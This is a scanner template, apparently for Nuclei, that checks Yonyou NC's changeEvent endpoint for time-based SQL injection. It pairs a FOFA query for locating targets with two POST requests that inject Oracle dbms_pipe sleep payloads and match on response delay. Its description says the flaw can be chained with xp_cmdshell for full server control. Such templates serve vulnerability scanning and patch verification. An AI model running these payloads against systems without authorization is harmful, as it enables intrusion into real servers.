id: yongyouNC-changeEvent-sql-time

info:
  name: 用友NC changeEvent SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="用友-UFIDA-NC"
    用友NC changeEvent接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
  reference:
    - https://mp.weixin.qq.com/s/1hwcKIzHaNzsizB6bj6YFQ
  tags: sql injection

http:
  - raw:
      - |
        POST /portal/pt/oacoSchedulerEvents/changeEvent?pageId=login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        event_id=1' AND 1=dbms_pipe.receive_message('RDS',4)--+#&startDate=2025-06-16 00:00:00&startDate_old=2025-06-16 24:00:00
      - |
        POST /portal/pt/oacoSchedulerEvents/changeEvent?pageId=login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        event_id=1' AND 1=dbms_pipe.receive_message('RDS',8)--+#&startDate=2025-06-16 00:00:00&startDate_old=2025-06-16 24:00:00
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and